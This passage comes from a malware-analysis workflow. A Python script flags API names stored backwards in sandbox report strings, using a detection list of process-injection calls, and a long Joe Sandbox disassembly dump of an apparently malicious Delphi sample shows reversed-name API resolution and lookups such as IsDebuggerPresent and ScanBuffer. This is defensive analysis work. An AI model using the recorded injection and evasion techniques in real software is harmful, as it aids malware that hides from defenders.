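# Assumption: the report joins the strings of one function with '$' in its
# "String ID" bullet, exactly as the visible bullets show.
STRING_ID_SEPARATOR = "$"

# Hypothetical, deliberately short allow-list of export names worth catching
# when stored reversed. In practice feed it the export tables of kernel32,
# kernelbase and ntdll.
KNOWN_APIS = {
    "GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
    "LoadLibraryA", "LoadLibraryW", "VirtualAlloc", "VirtualAllocEx",
    "VirtualProtect", "WriteProcessMemory", "CreateRemoteThread",
    "QueueUserAPC", "NtQueueApcThread", "ResumeThread",
    "SetWindowsHookExA", "SetWindowsHookExW", "CheckRemoteDebuggerPresent",
}
_KNOWN_APIS_LOWER = {name.lower(): name for name in KNOWN_APIS}

# Compiler/runtime artifacts that look like reconnaissance but are benign.
# The notes are the editor's, not text from the report.
RUNTIME_ARTIFACTS = {
    r"SOFTWARE\Borland\Delphi\RTL":
        "Delphi RTL startup key: identifies a Delphi-built module",
    "FPUMaskValue":
        "value read by Delphi RTL startup to set the FPU control word",
}


def split_string_id(string_id):
    """Split one 'String ID' bullet into its individual strings."""
    if not string_id:
        return []
    return string_id.split(STRING_ID_SEPARATOR)


def reversed_api_name(s):
    """Return the export name if `s` is a known API written backwards, else None."""
    return _KNOWN_APIS_LOWER.get(s[::-1].lower())


def classify(s):
    """Label one string as ('reversed-api', name), ('runtime-artifact', note) or ('other', '')."""
    api = reversed_api_name(s)
    if api is not None:
        return "reversed-api", api
    if s in RUNTIME_ARTIFACTS:
        return "runtime-artifact", RUNTIME_ARTIFACTS[s]
    return "other", ""


def triage(string_ids):
    """Classify every string from a list of 'String ID' bullets.

    The reversed API names are the actionable finding; the runtime artifacts
    are the caveat that stops a benign registry read being written up as recon.
    """
    report = {"reversed_apis": {}, "runtime_artifacts": {}, "other": []}
    for string_id in string_ids:
        for s in split_string_id(string_id):
            kind, detail = classify(s)
            if kind == "reversed-api":
                report["reversed_apis"][s] = detail
            elif kind == "runtime-artifact":
                report["runtime_artifacts"][s] = detail
            else:
                report["other"].append(s)
    return report


# Constructed input: the three 'String ID' bullets visible in the blocks above.
SAMPLE_STRING_IDS = [
    "Kernel32$sserddAcorPteG",
    r"FPUMaskValue$SOFTWARE\Borland\Delphi\RTL",
    "PkG$XMG$NG$NG",
]

if __name__ == "__main__":
    result = triage(SAMPLE_STRING_IDS)
    for reversed_form, api in result["reversed_apis"].items():
        print(f"reversed API name: {reversed_form!r} -> {api}")
    for key, note in result["runtime_artifacts"].items():
        print(f"runtime artifact:  {key!r} ({note})")
    print("unclassified:", result["other"])
```

On the constructed input the only reversed name recovered is GetProcAddress, the Delphi key and value are set aside as compiler artifacts, and the short strings PkG, XMG and NG stay unclassified, which is the right outcome: two-letter strings reversed will collide with nothing useful and should not be reported. When applying this to a whole report, collect every "String ID" bullet rather than the three shown here, and treat a reversed LoadLibrary or VirtualAlloc next to a reversed GetProcAddress as one dynamic-resolution stub rather than three separate findings.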
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                          • Instruction ID: 6007cc9947dcaa6a87c86f95aec0bb5e2f7af801d811f421b89508e478bbdef0
                                                          • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                          • Instruction Fuzzy Hash: 8351D371A00704AFDB22DF69CE41BAA77FAEF89724F14456EE809D7250E735EA01CB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                          • Instruction ID: bfeaae1c4481b2298efc2efb8720a6b678a60c27c7ea55a0081c92fd81ab1fcb
                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                          • Instruction Fuzzy Hash: 0D41E632A002009FCB11DFB8C994AADB7B6FF84718F1585A9D915EB390D731E901CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 242264518-0
                                                          • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                          • Instruction ID: 75be7c540779af916c053d72ae6d861686cad65327cd3c0483de0ef04b1675bc
                                                          • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                          • Instruction Fuzzy Hash: C6319C7680420AFBDF13AFA4DD58DEE7B6DEF85325B104269F918561A0DB31CD10CBA0
                                                          APIs
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 029B1986
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 029B199F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value___vcrt_
                                                          • String ID:
                                                          • API String ID: 1426506684-0
                                                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                          • Instruction ID: f959cf5e0e8450488dc3d2a3abd0f90464db8da570ae5962fd9bda2d573c8116
                                                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                          • Instruction Fuzzy Hash: E501F7336197926EA61727B8FEA47EB2B4EFF467B5720433AE21C514F0FF1188848558
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(?,00000000,028FAAE7,?,?,00000000), ref: 028FAA68
                                                            • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028FAAE7,?,?,00000000), ref: 028FAA98
                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 028FAAA3
                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028FAAE7,?,?,00000000), ref: 028FAAC1
                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 028FAACC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                          • String ID:
                                                          • API String ID: 4102113445-0
                                                          • Opcode ID: 2340f63aca7ce0afb3959e4e2622471ffd12ff57c84d3802246c7ffc05654317
                                                          • Instruction ID: 0a6c3d55f04dbe1877f721445cb4f82ac1d25611fed1b7ccc761a14dffaa8efe
                                                          • Opcode Fuzzy Hash: 2340f63aca7ce0afb3959e4e2622471ffd12ff57c84d3802246c7ffc05654317
                                                          • Instruction Fuzzy Hash: 1101DFBC2003447BF696AA68CD11B6F736DDB86720F510260E728E66C1E6699E108A66
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction ID: b804a348b608698bbbb2e8c2781b637fa2db5f407293c6688877f2db54f3a15e
                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction Fuzzy Hash: EDF062324043106B8621EB5CE9C5D9A77DEFE89760BE4881DF148DB910DB35F8C08E64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID: LfF$\lC$NG
                                                          • API String ID: 3732870572-3385470295
                                                          • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                          • Instruction ID: 60238a99c413e04c85f6684d51ed8ed58010d9cc15880b808b3020624fab1d71
                                                          • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                          • Instruction Fuzzy Hash: 02B18D316083409FD724FB24C891AAEB7EAEFD4710F44492EF88A52290EF359949CF57
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: __dosmaperr
• String ID: H
• API String ID: 2332233096-2852464175
• Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
• Instruction ID: 84b1667dae1cf147cdcbf0f8dc7708a9529f6f41199ac2c5d1526207c28b16dd
• Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
• Instruction Fuzzy Hash: 52A16932A141049FDF19EF68DC90BAD7BA5EF4A324F24026DE815DB3D1DB319812CB62
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: __freea
• String ID: PkGNG
• API String ID: 240046367-263838557
• Opcode ID: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
• Instruction ID: 3fe877a56ebaa363eb291bc6727628ea5ec6a649b4bb751765561100d6bdd39a
• Opcode Fuzzy Hash: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
• Instruction Fuzzy Hash: 9351A672A10216ABDB258F64DC81EBF77AEEF84754F25462DFD08D6190DB34DC40CAA2
APIs
• __EH_prolog.LIBCMT ref: 0297FDDC
• __CxxThrowException@8.LIBVCRUNTIME ref: 0297FEBD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: Exception@8H_prologThrow
• String ID: \lC$y~E
• API String ID: 3222999186-3657841620
• Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
• Instruction ID: c932e5f93f3afd27e17bc28e5d833a98ed15fe3bff4bb9beddbe0257365b2062
• Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
• Instruction Fuzzy Hash: B9518E72900218AADF04FB64DD969ED777EEF90314F50026AE80AA7091EF349B4DCF91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: _free_strpbrk
• String ID: *?$.
• API String ID: 3300345361-3972193922
• Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
• Instruction ID: fedbea9b8829b6ba6037f23c74acd00a86157453d870b0adc4446e5ab34d945f
• Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
• Instruction Fuzzy Hash: 7E518071E0021AAFDF14DFA8C880AEDBBB9EF88314F65816DD954E7340E771AA01CB51
APIs
• GetThreadLocale.KERNEL32(?,00000000,028FACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028FAB2F
  • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: f777c2c475e87c9dd247fbdb4058b1ff7b35c06a2532dd3943ab38bcb166b699
• Instruction ID: d2a8c45e93efa8d9daa461101b0178439d294ffadf8057e3a27ab8c80e772c66
• Opcode Fuzzy Hash: f777c2c475e87c9dd247fbdb4058b1ff7b35c06a2532dd3943ab38bcb166b699
• Instruction Fuzzy Hash: A241F57D7041084BE7D9EB7C88902BFF3EBDB86224B504522D75AC3354EA78ED05CA26
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
  • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
  • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
  • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
• GetModuleHandleA.KERNELBASE(?), ref: 0290821E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
• Opcode ID: 49ace51203f647a8c861bd1faa7076d2a716a2e7c265e67525ac8ed7bde4f0d9
• Instruction ID: 6f94c0220d397cd6ecd7fbc7ffcbc06d329dbb2c5545f7eb51a7c166033e8805
• Opcode Fuzzy Hash: 49ace51203f647a8c861bd1faa7076d2a716a2e7c265e67525ac8ed7bde4f0d9
• Instruction Fuzzy Hash: 21F09678B44708AFE740FFFCEC819AAB7EDFB8D7507514461B900D3690E670AE148A65
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 029AC8D4
  • Part of subcall function 029AC83D: std::exception::exception.LIBCONCRT ref: 029AC84A
• __CxxThrowException@8.LIBVCRUNTIME ref: 029AC8E2
  • Part of subcall function 029AD195: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 029AD1A2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
• String ID: !G$` G
• API String ID: 64778976-1850324976
• Opcode ID: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
• Instruction ID: e8ec3a9a4ebc6c116cafff1c2ccf58b86f1a5a60718cf1cd9997161547ad45ae
• Opcode Fuzzy Hash: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
• Instruction Fuzzy Hash: 20E0D836D10318379704B6BCAE009CA739DAD842147414037EA14EB150FBA88E4289D8
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,0290FAEB,UacInitialize,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize), ref: 0290F6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F700
Strings
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
• Opcode ID: 3be3feb8e0789bec6153f6645708d63e0af9b321e4206cb7f624442d47722dd0
• Instruction ID: dc9f69a3eed47f78f041f6dad3eb5734756ccfddcf4375a2b99a0e495e956700
• Opcode Fuzzy Hash: 3be3feb8e0789bec6153f6645708d63e0af9b321e4206cb7f624442d47722dd0
• Instruction Fuzzy Hash: B6D012A93503641DBE5072FC1CC4819038C999462D3300F20B232C64D3F9AAAA195117
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0291D10B,00000000,0291D11E), ref: 028FC47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028FC48B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
• Instruction ID: 2156ade97aa5391c89695d4feca638c6829e4bb4017bc917e8e15ae48b01285f
• Opcode Fuzzy Hash: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
• Instruction Fuzzy Hash: 0CD05EECA4431A9AF7C0EEF6548063137988328310F00C866EB01D5201E7AA5514CF19
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
